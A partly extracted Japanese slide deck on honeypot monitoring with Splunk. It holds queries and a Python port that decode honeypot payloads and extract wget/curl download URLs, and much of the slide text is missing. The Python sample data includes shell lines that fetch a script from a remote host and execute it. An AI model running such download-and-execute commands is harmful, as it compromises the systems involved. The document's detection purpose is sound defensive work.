Honeypot monitoring with Splunk (Splunkによるハニーポット監視.pdf)
sec-chick
September 30, 2018
Transcript
Honeypot monitoring with Splunk, sec-chick

WHO AM I
• sec-chick (@one_sec_chick)
• PSOC
• Honeypots: WoW Honeypot, Honeytrap

Overview diagram (only the labels survived extraction): Splunk, WoWHoneypot, Honeytrap, PC, VPS, SSH, Splunk
SPLUNK
• Splunk
• IT
> http://www.intellilink.co.jp/pd/products/package/security/splunk.html
• WoWHoneypot
• Honeytrap
Steps (slide text only partly recoverable):
1. SSH
2. Splunk
3. Splunk
4.
5. HEX
Attack_connection.local_port 10
Attack_connection.payload.data_hex (Hex → decoded)
1. Docker
2.
3. Splunk
4. Suricata
DOCKER
• Docker
• Docker →
• Docker
• cron, Splunk
Diagram (only the labels survived extraction): WoWHoneypot, Honeytrap, VPS, Honeypot, Docker, Splunk
SPLUNK
• Splunk
• DECRYPT (Splunk app)
• → Grep → → URL → VirusTotal
WOWHONEYPOT
| rex field=_raw "\"(?<Method_wow>[^\s]+)\s(?<wow_path>[^\s]+)\s([^\s]+)\s([^\s]+)\s([^\s]+)\s(?<base64_wow>.*$)"
| decrypt field="base64_wow" atob emit('base64_wow_decrypted')
| eval decode=urldecode(base64_wow_decrypted)
| rex field="decode" "wget.+(?<wget_wowhoneypot>https?://[\w/:\.\-]+?)\s"
| rex field="decode" "curl.+(?<curl_wowhoneypot>https?://[\w/:\.\-]+?)\s"

HONEYTRAP
| decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted')
| rex field="attack_connection.payload.data_decrypted" "wget.+(?<wget_honeytrap>https?://[\w/:\.\-]+?)\s"
| rex field="attack_connection.payload.data_decrypted" "curl.+(?<curl_honeytrap>https?://[\w/:\.\-]+?)\s"
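The same decode-and-extract pipeline outside Splunk, as an added example (not part of the deck, which only shows the SPL): the regexes are ported from the deck's rex commands; the log line and payload below are constructed samples, and the five-token layout before the base64 field is assumed to fit the deck's regex rather than taken from WoWHoneypot's documentation.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Ported from the deck's WoWHoneypot rex: a quoted request line (method, path,
# three more tokens) followed by the base64-encoded raw HTTP request.
WOW_RE = re.compile(
    r'"(?P<method>[^\s]+)\s(?P<path>[^\s]+)\s[^\s]+\s[^\s]+\s[^\s]+\s(?P<b64>.*$)'
)
# The deck's wget/curl URL patterns. The character class stops at "?", "=" and
# "&" (query strings are cut off) and a trailing whitespace character is required.
URL_RES = {
    "wget": re.compile(r"wget.+?(?P<url>https?://[\w/:.\-]+?)\s"),
    "curl": re.compile(r"curl.+?(?P<url>https?://[\w/:.\-]+?)\s"),
}

def extract_download_urls(text):
    """Return {tool: url} for wget/curl fetches found in a decoded payload."""
    found = {}
    for tool, rx in URL_RES.items():
        m = rx.search(text)
        if m:
            found[tool] = m.group("url")
    return found

def parse_wowhoneypot(line):
    """rex -> decrypt atob -> urldecode -> rex, for one WoWHoneypot access_log line."""
    m = WOW_RE.search(line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group("b64"), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None  # malformed base64 field: skip the line rather than crash
    decoded = unquote(raw)  # the urldecode() step
    return {"method": m.group("method"), "path": m.group("path"),
            "decoded": decoded, "urls": extract_download_urls(decoded)}

def parse_honeytrap(data_hex):
    """decrypt unhex -> rex, for one attack_connection.payload.data_hex value."""
    try:
        decoded = bytes.fromhex(data_hex).decode("utf-8", "replace")
    except ValueError:
        return None  # not valid hex
    return {"decoded": decoded, "urls": extract_download_urls(decoded)}

# Constructed samples, not real captures; 203.0.113.7 is a documentation address.
SAMPLE_REQUEST = ("POST /index.php HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n"
                  "cmd=cd%20%2Ftmp%3Bwget%20http%3A%2F%2F203.0.113.7%2Fbot.sh%20-O%20b%3Bsh%20b")
SAMPLE_WOW_LINE = ('[2018-09-30 10:00:00+0900] 198.51.100.23 192.0.2.10:80 "POST /index.php HTTP/1.1" 200 rule0 '
                   + base64.b64encode(SAMPLE_REQUEST.encode()).decode())
SAMPLE_HONEYTRAP_HEX = b"cd /tmp; curl http://203.0.113.7/x.sh -o x.sh; sh x.sh\n".hex()
```

The extracted URLs are the values the deck then looks up on VirusTotal.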
HONEYTRAP
SURICATA
• Grep
• →
• Suricata ??
• @Sec_S_Owl
• @cactus_pots
• @SugitaMuchi
• @soji256
• @morihi_soc
• Twitter, Slack: http://goo.gl/8bLkZA

• Splunk
•